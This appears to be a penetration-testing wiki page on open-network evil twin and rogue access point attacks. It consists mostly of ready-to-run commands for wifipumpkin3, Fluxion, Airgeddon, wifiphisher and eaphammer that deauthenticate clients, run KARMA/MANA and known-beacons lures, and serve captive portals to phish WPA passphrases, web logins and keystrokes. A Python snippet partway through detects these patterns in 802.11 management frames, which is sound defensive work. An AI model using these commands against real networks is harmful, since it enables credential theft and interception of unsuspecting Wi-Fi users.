11. Open Network (no passphrase) Rogue AP Evil Twin

Koutto edited this page Nov 1, 2020 · 1 revision

Basic Open Network

This basic setup can be used to perform standard Man-in-the-Middle attacks on the clients.

berate_ap <interface_AP> <interface_internet> <SSID>

Note: Internet sharing (forwarding) is enabled by default.

Open Network Evil Twin + Captive Portal Attack

Captive Portal can be used to serve:

  • Phishing page (fake form) to attempt to obtain:
    • WPA passphrase (when evil twin of WPA/WPA2 secured AP),
    • Credentials (e.g. Facebook, Gmail...)
  • Payload Delivery
  • NetNTLMv1/v2 hashes by forcing SMB connection

With wifipumpkin3:

wifipumpkin3 --xpulp "set interface wlan0; set ssid FreeWifi; set proxy captiveflask; set captiveflask.DarkLogin true; start"

Note: A custom captive portal can be developed based on https://github.com/mh4x0f/extra-captiveflask (use misc.extra_captiveflask); see also https://reigadaopsec.com/how-to-create-a-fake-access-point-with-wifipumpkin3/

With Fluxion (interactive + automated):

To automatically perform an Evil Twin attack against a WPA/WPA2 network, with a captive portal attack aimed at phishing the WPA passphrase, Fluxion can be used:

./fluxion.sh  # Starts multiple xterm, requires X session
  1. Run Handshake Snooper mode (capture a WPA/WPA2 handshake, used after phishing to check the validity of the submitted passphrase)
  2. Run Captive Portal mode (supports many box/router default web interfaces)
    • Spawn AP with same SSID as target AP (Evil Twin).
    • Send deauth + disassociation to clients.
    • Wait for client connection & successful phishing.
    • Check submitted WPA passphrase using captured handshake.

With Airgeddon (interactive + automated):

To automatically perform an Evil Twin attack against a WPA/WPA2 network, with a captive portal attack aimed at phishing the WPA passphrase, Airgeddon can be used (it works similarly to Fluxion; it worked better against Android devices in my tests):

./airgeddon.sh # Starts multiple xterm, requires X session

Open Network Evil Twin + KARMA/MANA/Loud MANA/Known Beacons Attack + Captive Portal

With wifiphisher:

  • Evil Twin + KARMA:
wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <interface_internet> \
-p firmware-upgrade --handshake-capture handshake.pcap -kN   # Interactive target AP selection

wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <internet_interface> \
-p firmware-upgrade --handshake-capture handshake.pcap --essid <target_SSID> -kN
  • Known Beacons Attack:
wifiphisher -aI <interface_rogue_AP> -eI <interface_deauthenticating> -iI <internet_interface> \
-p oauth-login --known-beacons --essid "Free WiFi" -kN

Note: Known beacons wordlist: https://github.com/wifiphisher/wifiphisher/blob/master/wifiphisher/data/wifiphisher-known-open-wlans

-p selects the captive portal scenario. Scenarios available:

With eaphammer:

  • Evil Twin + MANA (Improved KARMA):
./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID> \
--captive-portal --mana
  • Evil Twin + Loud MANA (Improved MANA):
./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID> \
--captive-portal --mana --loud
  • Evil Twin + Loud MANA (Improved MANA) + Known Beacons attack (to attack clients not performing active probing) - All-in-one / Most effective:
./eaphammer -i wlan0 --channel <channel_number> --auth open --essid <SSID> \
--captive-portal --mana --loud --known-beacons --known-ssids-file <ssid_wordlist>
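From the monitoring side, the three behaviours described above (an evil twin reusing a known SSID, a KARMA/MANA-style AP answering probes for many different SSIDs, and a known-beacons AP beaconing many SSIDs from one BSSID) each leave a distinctive pattern in the management frames a wireless IDS sees. The following is an added detection example, not code from this wiki or from any of the tools above; the KNOWN_APS inventory, the alert threshold and the sample frames are constructed assumptions.

```python
"""Flag rogue-AP behaviour in a list of observed 802.11 management frames."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Frame:
    kind: str        # "beacon" or "probe_resp"
    bssid: str
    ssid: str
    channel: int
    protected: bool  # Privacy bit set (WPA/WPA2) vs. open network


# Assumed inventory of legitimate APs maintained by the monitoring point.
KNOWN_APS = {"CorpWiFi": {"bssid": "aa:bb:cc:00:00:01", "protected": True}}

# Constructed sample capture (not real traffic).
SAMPLE = [
    Frame("beacon", "aa:bb:cc:00:00:01", "CorpWiFi", 6, True),
    Frame("beacon", "de:ad:be:ef:00:01", "CorpWiFi", 6, False),          # open evil twin
    Frame("probe_resp", "de:ad:be:ef:00:02", "HomeNet", 1, False),
    Frame("probe_resp", "de:ad:be:ef:00:02", "CoffeeShop", 1, False),
    Frame("probe_resp", "de:ad:be:ef:00:02", "AirportFree", 1, False),   # answers every probe
    Frame("beacon", "de:ad:be:ef:00:03", "Free WiFi", 11, False),
    Frame("beacon", "de:ad:be:ef:00:03", "xfinitywifi", 11, False),
    Frame("beacon", "de:ad:be:ef:00:03", "attwifi", 11, False),         # beacons a wordlist
]


def analyse(frames, known_aps=KNOWN_APS, many_ssids=3):
    """Return (alert_type, bssid, detail) tuples; many_ssids is an assumed threshold."""
    alerts = []
    beacons = defaultdict(set)    # bssid -> SSIDs it beacons
    responses = defaultdict(set)  # bssid -> SSIDs it sends probe responses for
    for f in frames:
        good = known_aps.get(f.ssid)
        # Known SSID from an unexpected BSSID, or with different security, is an evil twin.
        if good and (f.bssid != good["bssid"] or f.protected != good["protected"]):
            alert = ("evil_twin", f.bssid, f.ssid)
            if alert not in alerts:
                alerts.append(alert)
        (beacons if f.kind == "beacon" else responses)[f.bssid].add(f.ssid)
    # One BSSID answering probes for many unrelated SSIDs is KARMA/MANA behaviour.
    for bssid, ssids in responses.items():
        if len(ssids) >= many_ssids:
            alerts.append(("karma_mana", bssid, tuple(sorted(ssids))))
    # One BSSID beaconing many unrelated SSIDs is a known-beacons attack.
    for bssid, ssids in beacons.items():
        if len(ssids) >= many_ssids:
            alerts.append(("known_beacons", bssid, tuple(sorted(ssids))))
    return alerts
```

Feeding the parsed output of a monitor-mode capture into analyse() in place of SAMPLE gives a minimal wireless IDS check for the attacks in this section.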

Captive portal attack can capture credentials using:

  • Form submission sniffing
  • Keystroke capture (results stored in user.log)